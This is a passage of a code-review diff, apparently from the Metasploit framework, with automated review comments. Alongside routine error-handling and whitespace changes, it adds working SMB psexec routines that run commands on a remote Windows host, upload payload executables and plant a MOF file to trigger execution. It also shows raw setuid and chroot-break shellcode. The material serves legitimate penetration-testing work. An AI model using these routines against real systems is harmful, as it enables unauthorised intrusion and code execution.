rescue => e
set_error_on_response(e)
end
}

View File

@ -26,7 +26,7 @@ module ServiceServlet
data = get_db.services(opts)
includes = [:host]
set_json_response(data, includes)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -48,7 +48,7 @@ module ServiceServlet
opts[:id] = tmp_params[:id] if tmp_params[:id]
data = get_db.update_service(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -60,7 +60,7 @@ module ServiceServlet
opts = parse_json_request(request, false)
data = get_db.delete_service(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

View File

@ -19,7 +19,7 @@ module SessionEventServlet
opts = parse_json_request(request, false)
data = get_db().session_events(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

View File

@ -18,7 +18,7 @@ module SessionServlet
#opts = parse_json_request(request, false)
data = get_db().get_all_sessions()
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

View File

@ -23,7 +23,7 @@ module VulnAttemptServlet
opts = parse_json_request(request, false)
data = get_db.vuln_attempts(params.symbolize_keys)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
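Review bot: `opts = parse_json_request(request, false)` in this handler is assigned and never used; the query goes to `get_db.vuln_attempts(params.symbolize_keys)` instead. Either the call should use `opts` (matching the other GET servlets in this commit, which pass the parsed/sanitized params) or the unused line should go, so it is clear which input actually reaches the data service.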
@ -39,7 +39,7 @@ module VulnAttemptServlet
get_db.report_vuln_attempt(vuln, opts)
}
exec_report_job(request, &job)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

View File

@ -27,7 +27,7 @@ module VulnServlet
data = get_db.vulns(sanitized_params)
includes = [:host, :vulns_refs, :refs, :module_refs]
set_json_response(data, includes)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -40,7 +40,7 @@ module VulnServlet
get_db.report_vuln(opts)
}
exec_report_job(request, &job)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -54,7 +54,7 @@ module VulnServlet
opts[:id] = tmp_params[:id] if tmp_params[:id]
data = get_db.update_vuln(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -66,7 +66,7 @@ module VulnServlet
opts = parse_json_request(request, false)
data = get_db.delete_vuln(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

View File

@ -29,7 +29,7 @@ module WorkspaceServlet
data = get_db.workspaces(sanitized_params)
set_json_response(data, includes)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -41,7 +41,7 @@ module WorkspaceServlet
opts = parse_json_request(request, true)
workspace = get_db.add_workspace(opts)
set_json_response(workspace)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -55,7 +55,7 @@ module WorkspaceServlet
opts[:id] = tmp_params[:id] if tmp_params[:id]
data = get_db.update_workspace(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}
@ -67,7 +67,7 @@ module WorkspaceServlet
opts = parse_json_request(request, false)
data = get_db.delete_workspaces(opts)
set_json_response(data)
rescue Exception => e
rescue => e
set_error_on_response(e)
end
}

View File

@ -47,7 +47,7 @@ module ServletHelper
return set_json_response(data, includes)
end
rescue Exception => e
rescue => e
set_error_on_response(e)
end
end

View File

@ -2,6 +2,8 @@
require 'rex/proto/dcerpc/svcctl'
require 'windows_error'
require 'windows_error/win32'
require 'msf/core/exploit/exe'
require 'msf/core/exploit/wbemexec'
include WindowsError::Win32
@ -20,6 +22,7 @@ module Exploit::Remote::SMB::Client::Psexec
include Msf::Exploit::Windows_Constants
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Failure
def initialize(info = {})
super
@ -193,6 +196,246 @@ module Exploit::Remote::SMB::Client::Psexec
true
end
end
def powershell_installed?(smb_share, psh_path)
share = "\\\\#{datastore['RHOST']}\\#{smb_share}"
case smb_share.upcase
when 'ADMIN$'
path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
when 'C$'
path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
else
path = psh_path
end
simple.connect(share)
vprint_status("Checking for #{path}")
if smb_file_exist?(path)
vprint_status('PowerShell found')
psh = true
else
vprint_status('PowerShell not found')
psh = false
end
simple.disconnect(share)
psh
end
def execute_command(text, bat, cmd)
# Try and execute the provided command
execute = "%COMSPEC% /C echo #{cmd} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}"
vprint_status("Executing the command...")
begin
return psexec(execute)
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
print_error("Unable to execute specified command: #{e}")
return false
end
end
def execute_command_with_output(text, bat, cmd, smb_share, r_ip, delay, rt)
res = execute_command(text, bat, cmd)
if res
for i in 0..(rt)
Rex.sleep(delay)
# if the output file is still locked then the program is still likely running
if (exclusive_access(text, smb_share, r_ip))
break
elsif (i == rt)
print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
end
end
output = get_output(text, smb_share, r_ip)
end
cleanup_after(bat, smb_share, r_ip)
output
end
def execute_powershell_payload
ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
end
# Execute the powershell command
print_status("Executing the payload...")
begin
psexec(command)
rescue StandardError => exec_command_error
fail_with(Msf::Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
end
end
def native_upload(smb_share)
filename = "#{rand_text_alpha(8)}.exe"
serviceencoder = ''
# Upload the shellcode to a file
print_status("Uploading payload...")
smbshare = smb_share
fileprefix = ""
# if SHARE = Users/sasha/ or something like this
if smbshare =~ /.[\\\/]/
subfolder = true
smbshare = smb_share.dup
smbshare = smbshare.gsub(/^[\\\/]/,"")
folder_list = smbshare.split(/[\\\/]/)
smbshare = folder_list[0]
fileprefix = folder_list[1..-1].map {|a| a + "\\"}.join.gsub(/\\$/,"") if folder_list.length > 1
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
fd = smb_open("\\#{fileprefix}\\#(unknown)", 'rwct')
else
subfolder = false
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
fd = smb_open("\\#(unknown)", 'rwct')
end
exe = ''
opts = { :servicename => service_name, :serviceencoder => serviceencoder}
begin
exe = generate_payload_exe_service(opts)
fd << exe
ensure
fd.close
end
if subfolder
print_status("Created \\#{fileprefix}\\#(unknown)...")
else
print_status("Created \\#(unknown)...")
end
# Disconnect from the share
simple.disconnect("\\\\#{datastore['RHOST']}\\#{smbshare}")
# define the file location
if smb_share == 'ADMIN$'
file_location = "%SYSTEMROOT%\\#(unknown)"
elsif smb_share =~ /^[a-zA-Z]\$$/
file_location = smb_share.slice(0,1) + ":\\#(unknown)"
else
file_location = "\\\\127.0.0.1\\#{smbshare}\\#{fileprefix}\\#(unknown)"
end
psexec(file_location, false)
unless datastore['SERVICE_PERSIST']
print_status("Deleting \\#(unknown)...")
#This is not really useful but will prevent double \\ on the wire :)
if smb_share =~ /.[\\\/]/
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
begin
simple.delete("\\#{fileprefix}\\#(unknown)")
rescue XCEPT::ErrorCode => e
print_error("Delete of \\#{fileprefix}\\#(unknown) failed: #{e.message}")
end
else
simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
begin
simple.delete("\\#(unknown)")
rescue XCEPT::ErrorCode => e
print_error("Delete of \\#(unknown) failed: #{e.message}")
end
end
end
end
def mof_upload(smb_share)
share = "\\\\#{datastore['RHOST']}\\ADMIN$"
filename = "#{rand_text_alpha(8)}.exe"
# payload as exe
print_status("Trying wbemexec...")
print_status("Uploading Payload...")
if smb_share != 'ADMIN$'
print_error('Wbem will only work with ADMIN$ share')
return
end
simple.connect(share)
exe = generate_payload_exe
fd = smb_open("\\system32\\#(unknown)", 'rwct')
fd << exe
fd.close
print_status("Created %SystemRoot%\\system32\\#(unknown)")
# mof to cause execution of above
mofname = rand_text_alphanumeric(14) + ".MOF"
mof = generate_mof(mofname, filename)
print_status("Uploading MOF...")
fd = smb_open("\\system32\\wbem\\mof\\#{mofname}", 'rwct')
fd << mof
fd.close
print_status("Created %SystemRoot%\\system32\\wbem\\mof\\#{mofname}")
# Disconnect from the ADMIN$
simple.disconnect(share)
end
private
# Retrive output from command
def get_output(file, smb_share, r_ip)
print_status("Getting the command output...")
output = smb_read_file(smb_share, r_ip, file)
if output.nil?
print_error("Error getting command output. #{$!.class}. #{$!}.")
return
end
if output.empty?
print_status("Command finished with no output")
return
end
output
end
# check if our process is done using these files
def exclusive_access(*files, smb_share, r_ip)
begin
simple.connect("\\\\#{r_ip}\\#{smb_share}")
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_status("Unable to get handle: #{accesserror}")
return false
end
files.each do |file|
begin
print_status("checking if the file is unlocked")
fd = smb_open(file, 'rwo')
fd.close
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_status("Unable to get handle: #{accesserror}")
return false
end
simple.disconnect("\\\\#{r_ip}\\#{smb_share}")
end
return true
end
def cleanup_after(*files, smb_share, r_ip)
begin
simple.connect("\\\\#{r_ip}\\#{smb_share}")
rescue Rex::Proto::SMB::Exceptions::ErrorCode => accesserror
print_error("Unable to connect for cleanup: #{accesserror}. Maybe you'll need to manually remove #{files.join(", "
)} from the target.")
return
end
print_status("Executing cleanup...")
files.each do |file|
begin
smb_file_rm(file)
rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror
print_error("Unable to cleanup #{file}. Error: #{cleanuperror}")
end
end
left = files.collect{ |f| smb_file_exist?(f) }
if left.any?
print_error("Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.")
else
print_good("Cleanup was successful")
end
end
end
end
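Review bot: `cleanup_after` reports the wrong thing when files are left behind: `left = files.collect{ |f| smb_file_exist?(f) }` yields an array of booleans, so the message `Maybe you'll need to manually remove #{left.join(", ")} from the target.` prints `true, false` instead of file names; use `files.select { |f| smb_file_exist?(f) }`. In `exclusive_access`, `simple.disconnect("\\\\#{r_ip}\\#{smb_share}")` sits inside the `files.each` loop, so with two or more files the second check runs after the share has already been dropped, and both `return false` paths leave the share connected; move the disconnect after the loop (an `ensure` would also cover the error paths). Same pattern in `cleanup_after`, which never disconnects at all. Minor: `# Retrive output from command` should read `Retrieve`.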

View File

@ -93,69 +93,69 @@ module Msf::Payload::Bsd
def handle_x64_bsd_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x4d" +# or rax, 77 (setgid=311>>2=77)
"\x48\xc1\xe0\x02" +# shl rax, 2
"\x48\x83\xf0\x03" +# xor rax, 3 (311&3=3)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x48\x31\xd2" +# xor rdx, rdx 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x4d" + # or rax, 77 (setgid=311>>2=77)
"\x48\xc1\xe0\x02" + # shl rax, 2
"\x48\x83\xf0\x03" + # xor rax, 3 (311&3=3)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x48\x31\xd2" + # xor rdx, rdx 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x7e" +# or rax, 126 (setreuid=126)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x7e" + # or rax, 126 (setreuid=126)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x17" +# or rax, 23 (setuid=23)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x17" + # or rax, 23 (setuid=23)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x4e" +# or rax, 78 (setgid=312>>2=78)
"\x48\xc1\xe0\x02" +# shl rax, 2 (78<<2=312)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x48\x31\xd2" +# xor rdx, rdx 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x4e" + # or rax, 78 (setgid=312>>2=78)
"\x48\xc1\xe0\x02" + # shl rax, 2 (78<<2=312)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x48\x31\xd2" + # xor rdx, rdx 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x7f" +# or rax, 127 (setuid=127)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x7f" + # or rax, 127 (setuid=127)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x5a" +# or rax, 90 (setgid=181>>1=90)
"\x48\xd1\xe0" +# shl rax, 1
"\x48\x83\xc8\x01" +# or rax, 1 (setgid=181&1=1)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x5a" + # or rax, 90 (setgid=181>>1=90)
"\x48\xd1\xe0" + # shl rax, 1
"\x48\x83\xc8\x01" + # or rax, 1 (setgid=181&1=1)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['AppendExit'])
# exit(0)
app << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x01" +# or rax, 1 (exit=1)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
app << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x01" + # or rax, 1 (exit=1)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
end
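Review bot: since every line of this block is being re-indented anyway, the mislabelled syscall comments should be corrected in the same pass: inside the `# setresuid(0, 0, 0)` block the line `"\x48\x83\xc8\x4d" + # or rax, 77 (setgid=311>>2=77)` should say setresuid, inside `# setresgid(0, 0, 0)` the line `"\x48\x83\xc8\x4e" + # or rax, 78 (setgid=312>>2=78)` should say setresgid, and inside `# setregid(0, 0)` the line `"\x48\x83\xc8\x7f" + # or rax, 127 (setuid=127)` should say setregid. The bytes are untouched by this hunk, so only the comment text changes.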

View File

@ -59,70 +59,70 @@ module X86
def handle_x86_bsd_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x66\xb8\x37\x01" + # movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7e" + # movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x17" + # movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x66\xb8\x38\x01" + # movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7f" + # movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xb5" + # movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
app << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x01" + # movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end

View File

@ -99,113 +99,113 @@ module Msf::Payload::Linux
# Prepend
if (datastore['PrependFork'])
pre << "\x6a\x02" +# pushb $0x2 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 ; fork #
"\x85\xc0" +# test %eax,%eax #
"\x74\x06" +# jz 0xf #
"\x31\xc0" +# xor %eax,%eax #
"\xb0\x01" +# movb $0x1,%al ; exit #
"\xcd\x80" # int $0x80 #
pre << "\x6a\x02" + # pushb $0x2 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 ; fork #
"\x85\xc0" + # test %eax,%eax #
"\x74\x06" + # jz 0xf #
"\x31\xc0" + # xor %eax,%eax #
"\xb0\x01" + # movb $0x1,%al ; exit #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xa4" +# movb $0xa4,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\xf7\xe3" + # mull %ebx #
"\xb0\xa4" + # movb $0xa4,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x46" +# pushl $0x46 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x46" + # pushl $0x46 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x17" +# pushl $0x17 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x17" + # pushl $0x17 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xaa" +# movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\xf7\xe3" + # mull %ebx #
"\xb0\xaa" + # movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x47" +# pushl $0x47 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x47" + # pushl $0x47 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x2e" +# pushl $0x2e #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x2e" + # pushl $0x2e #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x46" +# pushl $0x46 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x46" + # pushl $0x46 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
# break chroot
pre << "\x6a\x3d" +# pushl $0x3d #
pre << "\x6a\x3d" + # pushl $0x3d #
# build dir str (ptr in ebx)
"\x89\xe3" +# movl %esp,%ebx #
"\x89\xe3" + # movl %esp,%ebx #
# mkdir(dir)
"\x6a\x27" +# pushl $0x27 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x6a\x27" + # pushl $0x27 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
# chroot(dir)
"\x89\xd9" +# movl %ebx,%ecx #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x89\xd9" + # movl %ebx,%ecx #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
# build ".." str (ptr in ebx)
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x66\x68\x2e\x2e" +# pushw $0x2e2e #
"\x89\xe3" +# movl %esp,%ebx #
"\x66\x68\x2e\x2e" + # pushw $0x2e2e #
"\x89\xe3" + # movl %esp,%ebx #
# loop changing dir
"\x6a\x3d" +# pushl $0x1e #
"\x59" +# popl %ecx #
"\xb0\x0c" +# movb $0xc,%al #
"\xcd\x80" +# int $0x80 #
"\xe2\xfa" +# loop -6 #
"\x6a\x3d" + # pushl $0x1e #
"\x59" + # popl %ecx #
"\xb0\x0c" + # movb $0xc,%al #
"\xcd\x80" + # int $0x80 #
"\xe2\xfa" + # loop -6 #
# final chroot
"\x6a\x3d" +# pushl $0x3d #
"\x89\xd9" +# movl %ebx,%ecx #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
"\x6a\x3d" + # pushl $0x3d #
"\x89\xd9" + # movl %ebx,%ecx #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
# Append exit(0)
if (datastore['AppendExit'])
app << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x01" +# pushl $0x01 #
"\x58" +# popl %eax #
app << "\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x01" + # pushl $0x01 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
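Review bot: in the `PrependChrootBreak` block, the `# loop changing dir` step carries a comment that does not match its bytes: `"\x6a\x3d" + # pushl $0x1e #` encodes `push 0x3d` (the very same two bytes the neighbouring lines annotate as `pushl $0x3d`), so either the loop-count comment or the immediate is wrong. Worth settling which was intended before this whitespace-only change lands and the line looks freshly reviewed.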
@ -216,65 +216,65 @@ module Msf::Payload::Linux
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\xa5" + # addi r0,r31,-347 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x47" + # addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x18" + # addi r0,r31,-488 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\xab" + # addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x48" + # addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" + # addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
